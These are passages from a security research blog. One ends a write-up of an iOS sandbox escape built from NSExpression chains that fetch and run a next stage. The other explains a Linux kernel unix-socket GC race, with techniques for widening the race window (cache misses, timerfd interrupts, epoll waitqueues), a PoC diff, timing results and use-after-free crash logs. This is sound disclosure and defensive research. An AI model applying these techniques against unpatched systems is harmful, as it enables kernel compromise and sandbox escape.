That data blob is decrypted with a hardcoded AES128 key, decompressed using zlib then parsed as a plist. That parsed plist is stored in the sharedAnonymizedStrings dictionary under the key "1".

Expression 5

[ [[NSThread mainThread] threadDictionary]

  addEntriesFromDictionary:

    [[CaliCalendarAnonymizer sharedAnonymizedStrings]

    objectForKey:@"1"]

]

This copies all the keys and values from the "next-stage" plist into the main thread's theadDictionary.

Expression 6

[ [NSExpression expressionWithFormat:

    [[[CaliCalendarAnonymizer sharedAnonymizedStrings]

      objectForKey:@"1"]

    objectForKey: @"a"]

  ]

  expressionValueWithObject:nil context:nil

]

Finally, this fetches the value of the "a" key from the next-stage plist, parses it as an NSExpression string and evaluates it.

End of the line

At this point we lose the ability to follow the exploit. The attackers have escaped the IMTranscoderAgent sandbox, requested a next-stage from the command and control server and executed it, all without any memory corruption or dependencies on particular versions of the operating system.

In response to this exploit iOS 15.1 significantly reduced the computational power available to NSExpressions:

NSExpression immediately forbids certain operations that have significant side effects, like creating and destroying objects. Additionally, casting string class names into Class objects with NSConstantValueExpression is deprecated.

In addition the PTSection and PTRow objects have been hardened with the following check added around the parsing of serialized NSPredicates:

if (os_variant_allows_internal_security_policies(

      "com.apple.PrototypeTools") {

  [coder decodeObjectOfClass:NSPredicate forKey:@"condition]

...

Object deserialization across trust boundaries still presents an enormous attack surface however.

Conclusion

Perhaps the most striking takeaway is the depth of the attack surface reachable from what would hopefully be a fairly constrained sandbox. With just two tricks (NSObject pointers in protocols and library loading gadgets) it's likely possible to attack almost every initWithCoder implementation in the dyld_shared_cache. There are presumably many other classes in addition to NSPredicate and NSExpression which provide the building blocks for logic-style exploits.

The expressive power of NSXPC just seems fundamentally ill-suited for use across sandbox boundaries, even though it was designed with exactly that in mind. The attack surface reachable from inside a sandbox should be minimal, enumerable and reviewable. Ideally only code which is required for correct functionality should be reachable; it should be possible to determine exactly what that exposed code is and the amount of exposed code should be small enough that manually reviewing it is tractable.

NSXPC requiring developers to explicitly add remotely-exposed methods to interface protocols is a great example of how to make the attack surface enumerable - you can at least find all the entry points fairly easily. However the support for inheritance means that the attack surface exposed there likely isn't reviewable; it's simply too large for anything beyond a basic example.

Refactoring these critical IPC boundaries to be more prescriptive - only allowing a much narrower set of objects in this case - would be a good step towards making the attack surface reviewable. This would probably require fairly significant refactoring for NSXPC; it's built around natively supporting the Objective-C inheritance model and is used very broadly. But without such changes the exposed attack surface is just too large to audit effectively.

The advent of Memory Tagging Extensions (MTE), likely shipping in multiple consumer devices across the ARM ecosystem this year, is a big step in the defense against memory corruption exploitation. But attackers innovate too, and are likely already two steps ahead with a renewed focus on logic bugs. This sandbox escape exploit is likely a sign of the shift we can expect to see over the next few years if the promises of MTE can be delivered. And this exploit was far more extensible, reliable and generic than almost any memory corruption exploit could ever hope to be.

Racing against the clock -- hitting a tiny kernel race window

By: Ryan
24 March 2022 at 20:51

TL;DR:

How to make a tiny kernel race window really large even on kernels without CONFIG_PREEMPT:

  • use a cache miss to widen the race window a little bit
  • make a timerfd expire in that window (which will run in an interrupt handler - in other words, in hardirq context)
  • make sure that the wakeup triggered by the timerfd has to churn through 50000 waitqueue items created by epoll

Racing one thread against a timer also avoids accumulating timing variations from two threads in each race attempt - hence the title. On the other hand, it also means you now have to deal with how hardware timers actually work, which introduces its own flavors of weird timing variations.

Introduction

I recently discovered a race condition (https://crbug.com/project-zero/2247) in the Linux kernel. (While trying to explain to someone how the fix for CVE-2021-0920 worked - I was explaining why the Unix GC is now safe, and then got confused because I couldn't actually figure out why it's safe after that fix, eventually realizing that it actually isn't safe.) It's a fairly narrow race window, so I was wondering whether it could be hit with a small number of attempts - especially on kernels that aren't built with CONFIG_PREEMPT, which would make it possible to preempt a thread with another thread, as I described at LSSEU2019.

This is a writeup of how I managed to hit the race on a normal Linux desktop kernel, with a hit rate somewhere around 30% if the proof of concept has been tuned for the specific machine. I didn't do a full exploit though, I stopped at getting evidence of use-after-free (UAF) accesses (with the help of a very large file descriptor table and userfaultfd, which might not be available to normal users depending on system configuration) because that's the part I was curious about.

This also demonstrates that even very small race conditions can still be exploitable if someone sinks enough time into writing an exploit, so be careful if you dismiss very small race windows as unexploitable or don't treat such issues as security bugs.

The UAF reproducer is in our bugtracker.

The bug

In the UNIX domain socket garbage collection code (which is needed to deal with reference loops formed by UNIX domain sockets that use SCM_RIGHTS file descriptor passing), the kernel tries to figure out whether it can account for all references to some file by comparing the file's refcount with the number of references from inflight SKBs (socket buffers). If they are equal, it assumes that the UNIX domain sockets subsystem effectively has exclusive access to the file because it owns all references.

(The same pattern also appears for files as an optimization in __fdget_pos(), see this LKML thread.)

The problem is that struct file can also be referenced from an RCU read-side critical section (which you can't detect by looking at the refcount), and such an RCU reference can be upgraded into a refcounted reference using get_file_rcu() / get_file_rcu_many() by __fget_files() as long as the refcount is non-zero. For example, when this happens in the dup() syscall, the resulting reference will then be installed in the FD table and be available for subsequent syscalls.

When the garbage collector (GC) believes that it has exclusive access to a file, it will perform operations on that file that violate the locking rules used in normal socket-related syscalls such as recvmsg() - unix_stream_read_generic() assumes that queued SKBs can only be removed under the ->iolock mutex, but the GC removes queued SKBs without using that mutex. (Thanks to Xingyu Jin for explaining that to me.)

One way of looking at this bug is that the GC is working correctly - here's a state diagram showing some of the possible states of a struct file, with more specific states nested under less specific ones and with the state transition in the GC marked:

All relevant states are RCU-accessible. An RCU-accessible object can have either a zero refcount or a positive refcount. Objects with a positive refcount can be either live or owned by the garbage collector. When the GC attempts to grab a file, it transitions from the state "live" to the state "owned by GC" by getting exclusive ownership of all references to the file.

While __fget_files() is making an incorrect assumption about the state of the struct file while it is trying to narrow down its possible states - it checks whether get_file_rcu() / get_file_rcu_many() succeeds, which narrows the file's state down a bit but not far enough:

__fget_files() first uses get_file_rcu() to conditionally narrow the state of a file from "any RCU-accessible state" to "any refcounted state". Then it has to narrow the state from "any refcounted state" to "live", but instead it just assumes that they are equivalent.

And this directly leads to how the bug was fixed (there's another follow-up patch, but that one just tries to clarify the code and recoup some of the resulting performance loss) - the fix adds another check in __fget_files() to properly narrow down the state of the file such that the file is guaranteed to be live:

The fix is to properly narrow the state from "any refcounted state" to "live" by checking whether the file is still referenced by a file descriptor table entry.

The fix ensures that a live reference can only be derived from another live reference by comparing with an FD table entry, which is guaranteed to point to a live object.

[Sidenote: This scheme is similar to the one used for struct page - gup_pte_range() also uses the "grab pointer, increment refcount, recheck pointer" pattern for locklessly looking up a struct page from a page table entry while ensuring that new refcounted references can't be created without holding an existing reference. This is really important for struct page because a page can be given back to the page allocator and reused while gup_pte_range() holds an uncounted reference to it - freed pages still have their struct page, so there's no need to delay freeing of the page - so if this went wrong, you'd get a page UAF.]

My initial suggestion was to instead fix the issue by changing how unix_gc() ensures that it has exclusive access, letting it set the file's refcount to zero to prevent turning RCU references into refcounted ones; this would have avoided adding any code in the hot __fget_files() path, but it would have only fixed unix_gc(), not the __fdget_pos() case I discovered later, so it's probably a good thing this isn't how it was fixed:

[Sidenote: In my original bug report I wrote that you'd have to wait an RCU grace period in the GC for this, but that wouldn't be necessary as long as the GC ensures that a reaped socket's refcount never becomes non-zero again.]

The race

There are multiple race conditions involved in exploiting this bug, but by far the trickiest to hit is that we have to race an operation into the tiny race window in the middle of __fget_files() (which can e.g. be reached via dup()), between the file descriptor table lookup and the refcount increment:

static struct file *__fget_files(struct files_struct *files, unsigned int fd,

                                 fmode_t mask, unsigned int refs)

{

        struct file *file;

        rcu_read_lock();

loop:

        file = files_lookup_fd_rcu(files, fd); // race window start

        if (file) {

                /* File object ref couldn't be taken.

                 * dup2() atomicity guarantee is the reason

                 * we loop to catch the new file (or NULL pointer)

                 */

                if (file->f_mode & mask)

                        file = NULL;

                else if (!get_file_rcu_many(file, refs)) // race window end

                        goto loop;

        }

        rcu_read_unlock();

        return file;

}

In this race window, the file descriptor must be closed (to drop the FD's reference to the file) and a unix_gc() run must get past the point where it checks the file's refcount ("total_refs = file_count(u->sk.sk_socket->file)").

In the Debian 5.10.0-9-amd64 kernel at version 5.10.70-1, that race window looks as follows:

<__fget_files+0x1e> cmp    r10,rax

<__fget_files+0x21> sbb    rax,rax

<__fget_files+0x24> mov    rdx,QWORD PTR [r11+0x8]

<__fget_files+0x28> and    eax,r8d

<__fget_files+0x2b> lea    rax,[rdx+rax*8]

<__fget_files+0x2f> mov    r12,QWORD PTR [rax] ; RACE WINDOW START

; r12 now contains file*

<__fget_files+0x32> test   r12,r12

<__fget_files+0x35> je     ffffffff812e3df7 <__fget_files+0x77>

<__fget_files+0x37> mov    eax,r9d

<__fget_files+0x3a> and    eax,DWORD PTR [r12+0x44] ; LOAD (for ->f_mode)

<__fget_files+0x3f> jne    ffffffff812e3df7 <__fget_files+0x77>

<__fget_files+0x41> mov    rax,QWORD PTR [r12+0x38] ; LOAD (for ->f_count)

<__fget_files+0x46> lea    rdx,[r12+0x38]

<__fget_files+0x4b> test   rax,rax

<__fget_files+0x4e> je     ffffffff812e3def <__fget_files+0x6f>

<__fget_files+0x50> lea    rcx,[rsi+rax*1]

<__fget_files+0x54> lock cmpxchg QWORD PTR [rdx],rcx ; RACE WINDOW END (on cmpxchg success)

As you can see, the race window is fairly small - around 12 instructions, assuming that the cmpxchg succeeds.

Missing some cache

Luckily for us, the race window contains the first few memory accesses to the struct file; therefore, by making sure that the struct file is not present in the fastest CPU caches, we can widen the race window by as much time as the memory accesses take. The standard way to do this is to use an eviction pattern / eviction set; but instead we can also make the cache line dirty on another core (see Anders Fogh's blogpost for more detail). (I'm not actually sure about the intricacies of how much latency this adds on different manufacturers' CPU cores, or on different CPU generations - I've only tested different versions of my proof-of-concept on Intel Skylake and Tiger Lake. Differences in cache coherency protocols or snooping might make a big difference.)

For the cache line containing the flags and refcount of a struct file, this can be done by, on another CPU, temporarily bumping its refcount up and then changing it back down, e.g. with close(dup(fd)) (or just by accessing the FD in pretty much any way from a multithreaded process).

However, when we're trying to hit the race in __fget_files() via dup(), we don't want any cache misses to occur before we hit the race window - that would slow us down and probably make us miss the race. To prevent that from happening, we can call dup() with a different FD number for a warm-up run shortly before attempting the race. Because we also want the relevant cache line in the FD table to be hot, we should choose the FD number for the warm-up run such that it uses the same cache line of the file descriptor table.

An interruption

Okay, a cache miss might be something like a few dozen or maybe hundred nanoseconds or so - that's better, but it's not great. What else can we do to make this tiny piece of code much slower to execute?

On Android, kernels normally set CONFIG_PREEMPT, which would've allowed abusing the scheduler to somehow interrupt the execution of this code. The way I've done this in the past was to give the victim thread a low scheduler priority and pin it to a specific CPU core together with another high-priority thread that is blocked on a read() syscall on an empty pipe (or eventfd); when data is written to the pipe from another CPU core, the pipe becomes readable, so the high-priority thread (which is registered on the pipe's waitqueue) becomes schedulable, and an inter-processor interrupt (IPI) is sent to the victim's CPU core to force it to enter the scheduler immediately.

One problem with that approach, aside from its reliance on CONFIG_PREEMPT, is that any timing variability in the kernel code involved in sending the IPI makes it harder to actually preempt the victim thread in the right spot.

(Thanks to the Xen security team - I think the first time I heard the idea of using an interrupt to widen a race window might have been from them.)

Setting an alarm

A better way to do this on an Android phone would be to trigger the scheduler not from an IPI, but from an expiring high-resolution timer on the same core, although I didn't get it to work (probably because my code was broken in unrelated ways).

High-resolution timers (hrtimers) are exposed through many userspace APIs. Even the timeout of select()/pselect() uses an hrtimer, although this is an hrtimer that normally has some slack applied to it to allow batching it with timers that are scheduled to expire a bit later. An example of a non-hrtimer-based API is the timeout used for reading from a UNIX domain socket (and probably also other types of sockets?), which can be set via SO_RCVTIMEO.

The thing that makes hrtimers "high-resolution" is that they don't just wait for the next periodic clock tick to arrive; instead, the expiration time of the next hrtimer on the CPU core is programmed into a hardware timer. So we could set an absolute hrtimer for some time in the future via something like timer_settime() or timerfd_settime(), and then at exactly the programmed time, the hardware will raise an interrupt! We've made the timing behavior of the OS irrelevant for the second side of the race, the only thing that matters is the hardware! Or... well, almost...

[Sidenote] Absolute timers: Not quite absolute

So we pick some absolute time at which we want to be interrupted, and tell the kernel using a syscall that accepts an absolute time, in nanoseconds. And then when that timer is the next one scheduled, the OS converts the absolute time to whatever clock base/scale the hardware timer is based on, and programs it into hardware. And the hardware usually supports programming timers with absolute time - e.g. on modern X86 (with X86_FEATURE_TSC_DEADLINE_TIMER), you can simply write an absolute Time Stamp Counter(TSC) deadline into MSR_IA32_TSC_DEADLINE, and when that deadline is reached, you get an interrupt. The situation on arm64 is similar, using the timer's comparator register (CVAL).

However, on both X86 and arm64, even though the clockevent subsystem is theoretically able to give absolute timestamps to clockevent drivers (via ->set_next_ktime()), the drivers instead only implement ->set_next_event(), which takes a relative time as argument. This means that the absolute timestamp has to be converted into a relative one, only to be converted back to absolute a short moment later. The delay between those two operations is essentially added to the timer's expiration time.

Luckily this didn't really seem to be a problem for me; if it was, I would have tried to repeatedly call timerfd_settime() shortly before the planned expiry time to ensure that the last time the hardware timer is programmed, the relevant code path is hot in the caches. (I did do some experimentation on arm64, where this seemed to maybe help a tiny bit, but I didn't really analyze it properly.)

A really big list of things to do

Okay, so all the stuff I said above would be helpful on an Android phone with CONFIG_PREEMPT, but what if we're trying to target a normal desktop/server kernel that doesn't have that turned on?

Well, we can still trigger hrtimer interrupts the same way - we just can't use them to immediately enter the scheduler and preempt the thread anymore. But instead of using the interrupt for preemption, we could just try to make the interrupt handler run for a really long time.

Linux has the concept of a "timerfd", which is a file descriptor that refers to a timer. You can e.g. call read() on a timerfd, and that operation will block until the timer has expired. Or you can monitor the timerfd using epoll, and it will show up as readable when the timer expires.

When a timerfd becomes ready, all the timerfd's waiters (including epoll watches), which are queued up in a linked list, are woken up via the wake_up() path - just like when e.g. a pipe becomes readable. Therefore, if we can make the list of waiters really long, the interrupt handler will have to spend a lot of time iterating over that list.

And for any waitqueue that is wired up to a file descriptor, it is fairly easy to add a ton of entries thanks to epoll. Epoll ties its watches to specific FD numbers, so if you duplicate an FD with hundreds of dup() calls, you can then use a single epoll instance to install hundreds of waiters on the file. Additionally, a single process can have lots of epoll instances. I used 500 epoll instances and 100 duplicate FDs, resulting in 50 000 waitqueue items.

Measuring race outcomes

A nice aspect of this race condition is that if you only hit the difficult race (close() the FD and run unix_gc() while dup() is preempted between FD table lookup and refcount increment), no memory corruption happens yet, but you can observe that the GC has incorrectly removed a socket buffer (SKB) from the victim socket. Even better, if the race fails, you can also see in which direction it failed, as long as no FDs below the victim FD are unused:

  • If dup() returns -1, it was called too late / the interrupt happened too soon: The file* was already gone from the FD table when __fget_files() tried to load it.
  • If dup() returns a file descriptor:
  • If it returns an FD higher than the victim FD, this implies that the victim FD was only closed after dup() had already elevated the refcount and allocated a new FD. This means dup() was called too soon / the interrupt happened too late.
  • If it returns the old victim FD number:
  • If recvmsg() on the FD returned by dup() returns no data, it means the race succeeded: The GC wrongly removed the queued SKB.
  • If recvmsg() returns data, the interrupt happened between the refcount increment and the allocation of a new FD. dup() was called a little bit too soon / the interrupt happened a little bit too late.

Based on this, I repeatedly tested different timing offsets, using a spinloop with a variable number of iterations to skew the timing, and plotted what outcomes the race attempts had depending on the timing skew.

Results: Debian kernel, on Tiger Lake

I tested this on a Tiger Lake laptop, with the same kernel as shown in the disassembly. Note that "0" on the X axis is offset -300 ns relative to the timer's programmed expiry.

This graph shows histograms of race attempt outcomes (too early, success, or too late), with the timing offset at which the outcome occurred on the X axis. The graph shows that depending on the timing offset, up to around 1/3 of race attempts succeeded.

Results: Other kernel, on Skylake

This graph shows similar histograms for a Skylake processor. The exact distribution is different, but again, depending on the timing offset, around 1/3 of race attempts succeeded.

These measurements are from an older laptop with a Skylake CPU, running a different kernel. Here "0" on the X axis is offset -1 us relative to the timer. (These timings are from a system that's running a different kernel from the one shown above, but I don't think that makes a difference.)

The exact timings of course look different between CPUs, and they probably also change based on CPU frequency scaling? But still, if you know what the right timing is (or measure the machine's timing before attempting to actually exploit the bug), you could hit this narrow race with a success rate of about 30%!

How important is the cache miss?

The previous section showed that with the right timing, the race succeeds with a probability around 30% - but it doesn't show whether the cache miss is actually important for that, or whether the race would still work fine without it. To verify that, I patched my test code to try to make the file's cache line hot (present in the cache) instead of cold (not present in the cache):

@@ -312,8 +312,10 @@

     }

 

+#if 0

     // bounce socket's file refcount over to other cpu

     pin_to(2);

     close(SYSCHK(dup(RESURRECT_FD+1-1)));

     pin_to(1);

+#endif

 

     //printf("setting timer\n");

@@ -352,5 +354,5 @@

     close(loop_root);

     while (ts_is_in_future(spin_stop))

-      close(SYSCHK(dup(FAKE_RESURRECT_FD)));

+      close(SYSCHK(dup(RESURRECT_FD)));

     while (ts_is_in_future(my_launch_ts)) /*spin*/;

With that patch, the race outcomes look like this on the Tiger Lake laptop:

This graph is a histogram of race outcomes depending on timing offset; it looks similar to the previous graphs, except that almost no race attempts succeed anymore.

But wait, those graphs make no sense!

If you've been paying attention, you may have noticed that the timing graphs I've been showing are really weird. If we were deterministically hitting the race in exactly the same way every time, the timing graph should look like this (looking just at the "too-early" and "too-late" cases for simplicity):

A sketch of a histogram of race outcomes where the "too early" outcome suddenly drops from 100% probability to 0% probability, and a bit afterwards, the "too late" outcome jumps from 0% probability to 100%

Sure, maybe there is some microarchitectural state that is different between runs, causing timing variations - cache state, branch predictor state, frequency scaling, or something along those lines -, but a small number of discrete events that haven't been accounted for should be adding steps to the graph. (If you're mathematically inclined, you can model that as the result of a convolution of the ideal timing graph with the timing delay distributions of individual discrete events.) For two unaccounted events, that might look like this:

A sketch of a histogram of race outcomes where the "too early" outcome drops from 100% probability to 0% probability in multiple discrete steps, and overlapping that, the "too late" outcome goes up from 0% probability to 100% in multiple discrete steps

But what the graphs are showing is more of a smooth, linear transition, like this:

A sketch of a histogram of race outcomes where the "too early" outcome's share linearly drops while the "too late" outcome's share linearly rises

And that seems to me like there's still something fundamentally wrong. Sure, if there was a sufficiently large number of discrete events mixed together, the curve would eventually just look like a smooth smear - but it seems unlikely to me that there is such a large number of somewhat-evenly distributed random discrete events. And sure, we do get a small amount of timing inaccuracy from sampling the clock in a spinloop, but that should be bounded to the execution time of that spinloop, and the timing smear is far too big for that.

So it looks like there is a source of randomness that isn't a discrete event, but something that introduces a random amount of timing delay within some window. So I became suspicious of the hardware timer. The kernel is using MSR_IA32_TSC_DEADLINE, and the Intel SDM tells us that that thing is programmed with a TSC value, which makes it look as if the timer has very high granularity. But MSR_IA32_TSC_DEADLINE is a newer mode of the LAPIC timer, and the older LAPIC timer modes were instead programmed in units of the APIC timer frequency. According to the Intel SDM, Volume 3A, section 10.5.4 "APIC Timer", that is "the processor’s bus clock or core crystal clock frequency (when TSC/core crystal clock ratio is enumerated in CPUID leaf 0x15) divided by the value specified in the divide configuration register". This frequency is significantly lower than the TSC frequency. So perhaps MSR_IA32_TSC_DEADLINE is actually just a front-end to the same old APIC timer?

I tried to measure the difference between the programmed TSC value and when execution was actually interrupted (not when the interrupt handler starts running, but when the old execution context is interrupted - you can measure that if the interrupted execution context is just running RDTSC in a loop); that looks as follows:

A graph showing noise. Delays from deadline TSC to last successful TSC read before interrupt look essentially random, in the range from around -130 to around 10.

As you can see, the expiry of the hardware timer indeed adds a bunch of noise. The size of the timing difference is also very close to the crystal clock frequency - the TSC/core crystal clock ratio on this machine is 117. So I tried plotting the absolute TSC values at which execution was interrupted, modulo the TSC / core crystal clock ratio, and got this:

A graph showing a clear grouping around 0, roughly in the range -20 to 10, with some noise scattered over the rest of the graph.

This confirms that MSR_IA32_TSC_DEADLINE is (apparently) an interface that internally converts the specified TSC value into less granular bus clock / core crystal clock time, at least on some Intel CPUs.

But there's still something really weird here: The TSC values at which execution seems to be interrupted were at negative offsets relative to the programmed expiry time, as if the timeouts were rounded down to the less granular clock, or something along those lines. To get a better idea of how timer interrupts work, I measured on yet another system (an old Haswell CPU) with a patched kernel when execution is interrupted and when the interrupt handler starts executing relative to the programmed expiry time (and also plotted the difference between the two):

A graph showing that the skid from programmed interrupt time to execution interruption is around -100 to -30 cycles, the skid to interrupt entry is around 360 to 420 cycles, and the time from execution interruption to interrupt entry has much less timing variance and is at around 440 cycles.

So it looks like the CPU starts handling timer interrupts a little bit before the programmed expiry time, but interrupt handler entry takes so long (~450 TSC clock cycles?) that by the time the CPU starts executing the interrupt handler, the timer expiry time has long passed.

Anyway, the important bit for us is that when the CPU interrupts execution due to timer expiry, it's always at a LAPIC timer edge; and LAPIC timer edges happen when the TSC value is a multiple of the TSC/LAPIC clock ratio. An exploit that doesn't take that into account and wrongly assumes that MSR_IA32_TSC_DEADLINE has TSC granularity will have its timing smeared by one LAPIC clock period, which can be something like 40ns.

The ~30% accuracy we could achieve with the existing PoC with the right timing is already not terrible; but if we control for the timer's weirdness, can we do better?

The problem is that we are effectively launching the race with two timers that behave differently: One timer based on calling clock_gettime() in a loop (which uses the high-resolution TSC to compute a time), the other a hardware timer based on the lower-resolution LAPIC clock. I see two options to fix this:

  1. Try to ensure that the second timer is set at the start of a LAPIC clock period - that way, the second timer should hopefully behave exactly like the first (or have an additional fixed offset, but we can compensate for that).
  2. Shift the first timer's expiry time down according to the distance from the second timer to the previous LAPIC clock period.

(One annoyance with this is that while we can grab information on how wall/monotonic time is calculated from TSC from the vvar mapping used by the vDSO, the clock is subject to minuscule additional corrections at every clock tick, which occur every 4ms on standard distro kernels (with CONFIG_HZ=250) as long as any core is running.)

I tried to see whether the timing graph would look nicer if I accounted for this LAPIC clock rounding and also used a custom kernel to cheat and control for possible skid introduced by the absolute-to-relative-and-back conversion of the expiry time (see further up), but that still didn't help all that much.

(No) surprise: clock speed matters

Something I should've thought about way earlier is that of course, clock speed matters. On newer Intel CPUs with P-states, the CPU is normally in control of its own frequency, and dynamically adjusts it as it sees fit; the OS just provides some hints.

Linux has an interface that claims to tell you the "current frequency" of each CPU core in /sys/devices/system/cpu/cpufreq/policy<n>/scaling_cur_freq, but when I tried using that, I got a different "frequency" every time I read that file, which seemed suspicious.

Looking at the implementation, it turns out that the value shown there is calculated in arch_freq_get_on_cpu() and its callees - the value is calculated on demand when the file is read, with results cached for around 10 milliseconds. The value is determined as the ratio between the deltas of MSR_IA32_APERF and MSR_IA32_MPERF between the last read and the current one. So if you have some tool that is polling these values every few seconds and wants to show average clock frequency over that time, it's probably a good way of doing things; but if you actually want the current clock frequency, it's not a good fit.

I hacked a helper into my kernel that samples both MSRs twice in quick succession, and that gives much cleaner results. When I measure the clock speeds and timing offsets at which the race succeeds, the result looks like this (showing just two clock speeds; the Y axis is the number of race successes at the clock offset specified on the X axis and the frequency scaling specified by the color):

A graph showing that the timing of successful race attempts depends on the CPU's performance setting - at 11/28 performance, most successful race attempts occur around clock offset -1200 (in TSC units), while at 14/28 performance, most successful race attempts occur around clock offset -1000.

So clearly, dynamic frequency scaling has a huge impact on the timing of the race - I guess that's to be expected, really.

But even accounting for all this, the graph still looks kind of smooth, so clearly there is still something more that I'm missing - oh well. I decided to stop experimenting with the race's timing at this point, since I didn't want to sink too much time into it. (Or perhaps I actually just stopped because I got distracted by newer and shinier things?)

Causing a UAF

Anyway, I could probably spend much more time trying to investigate the timing variations (and probably mostly bang my head against a wall because details of execution timing are really difficult to understand in detail, and to understand it completely, it might be necessary to use something like Gamozo Labs' "Sushi Roll" and then go through every single instruction in detail and compare the observations to the internal architecture of the CPU). Let's not do that, and get back to how to actually exploit this bug!

To turn this bug into memory corruption, we have to abuse that the recvmsg() path assumes that SKBs on the receive queue are protected from deletion by the socket mutex while the GC actually deletes SKBs from the receive queue without touching the socket mutex. For that purpose, while the unix GC is running, we have to start a recvmsg() call that looks up the victim SKB, block until the unix GC has freed the SKB, and then let recvmsg() continue operating on the freed SKB. This is fairly straightforward - while it is a race, we can easily slow down unix_gc() for multiple milliseconds by creating lots of sockets that are not directly referenced from the FD table and have many tiny SKBs queued up - here's a graph showing the unix GC execution time on my laptop, depending on the number of queued SKBs that the GC has to scan through:

A graph showing the time spent per GC run depending on the number of queued SKBs. The relationship is roughly linear.

To turn this into a UAF, it's also necessary to get past the following check near the end of unix_gc():

       /* All candidates should have been detached by now. */

        BUG_ON(!list_empty(&gc_candidates));

gc_candidates is a list that previously contained all sockets that were deemed to be unreachable by the GC. Then, the GC attempted to free all those sockets by eliminating their mutual references. If we manage to keep a reference to one of the sockets that the GC thought was going away, the GC detects that with the BUG_ON().

But we don't actually need the victim SKB to reference a socket that the GC thinks is going away; in scan_inflight(), the GC targets any SKB with a socket that is marked UNIX_GC_CANDIDATE, meaning it just had to be a candidate for being scanned by the GC. So by making the victim SKB hold a reference to a socket that is not directly referenced from a file descriptor table, but is indirectly referenced by a file descriptor table through another socket, we can ensure that the BUG_ON() won't trigger.

I extended my reproducer with this trick and some userfaultfd trickery to make recv() run with the right timing. Nowadays you don't necessarily get full access to userfaultfd as a normal user, but since I'm just trying to show the concept, and there are alternatives to userfaultfd (using FUSE or just slow disk access), that's good enough for this blogpost.

When a normal distro kernel is running normally, the UAF reproducer's UAF accesses won't actually be noticeable; but if you add the kernel command line flag slub_debug=FP (to enable SLUB's poisoning and sanity checks), the reproducer quickly crashes twice, first with a poison dereference and then a poison overwrite detection, showing that one byte of the poison was incremented:

general protection fault, probably for non-canonical address 0x6b6b6b6b6b6b6b6b: 0000 [#1] SMP NOPTI

CPU: 1 PID: 2655 Comm: hardirq_loop Not tainted 5.10.0-9-amd64 #1 Debian 5.10.70-1

[...]

RIP: 0010:unix_stream_read_generic+0x72b/0x870

Code: fe ff ff 31 ff e8 85 87 91 ff e9 a5 fe ff ff 45 01 77 44 8b 83 80 01 00 00 85 c0 0f 89 10 01 00 00 49 8b 47 38 48 85 c0 74 23 <0f> bf 00 66 85 c0 0f 85 20 01 00 00 4c 89 fe 48 8d 7c 24 58 44 89

RSP: 0018:ffffb789027f7cf0 EFLAGS: 00010202

RAX: 6b6b6b6b6b6b6b6b RBX: ffff982d1d897b40 RCX: 0000000000000000

RDX: 6a0fe1820359dce8 RSI: ffffffffa81f9ba0 RDI: 0000000000000246

RBP: ffff982d1d897ea8 R08: 0000000000000000 R09: 0000000000000000

R10: 0000000000000000 R11: ffff982d2645c900 R12: ffffb789027f7dd0

R13: ffff982d1d897c10 R14: 0000000000000001 R15: ffff982d3390e000

FS:  00007f547209d740(0000) GS:ffff98309fa40000(0000) knlGS:0000000000000000

CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033

CR2: 00007f54722cd000 CR3: 00000001b61f4002 CR4: 0000000000770ee0

PKRU: 55555554

Call Trace:

[...]

 unix_stream_recvmsg+0x53/0x70

[...]

 __sys_recvfrom+0x166/0x180

[...]

 __x64_sys_recvfrom+0x25/0x30

 do_syscall_64+0x33/0x80

 entry_SYSCALL_64_after_hwframe+0x44/0xa9

[...]

---[ end trace 39a81eb3a52e239c ]---

=============================================================================

BUG skbuff_head_cache (Tainted: G      D          ): Poison overwritten

-----------------------------------------------------------------------------

INFO: 0x00000000d7142451-0x00000000d7142451 @offset=68. First byte 0x6c instead of 0x6b

INFO: Slab 0x000000002f95c13c objects=32 used=32 fp=0x0000000000000000 flags=0x17ffffc0010200

INFO: Object 0x00000000ef9c59c8 @offset=0 fp=0x00000000100a3918

Object   00000000ef9c59c8: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   0000000097454be8: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   0000000035f1d791: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   00000000af71b907: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   000000000d2d371e: 6b 6b 6b 6b 6c 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkklkkkkkkkkkkk

Object   0000000000744b35: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   00000000794f2935: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   000000006dc06746: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   000000005fb18682: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   0000000072eb8dd2: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   00000000b5b572a9: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   0000000085d6850b: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   000000006346150b: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   000000000ddd1ced: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b a5  kkkkkkkkkkkkkkk.

Padding  00000000e00889a7: 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a  ZZZZZZZZZZZZZZZZ

Padding  00000000d190015f: 5a 5a 5a 5a 5a 5a 5a 5a                          ZZZZZZZZ

CPU: 7 PID: 1641 Comm: gnome-shell Tainted: G    B D           5.10.0-9-amd64 #1 Debian 5.10.70-1

[...]

Call Trace:

 dump_stack+0x6b/0x83

 check_bytes_and_report.cold+0x79/0x9a

 check_object+0x217/0x260

[...]

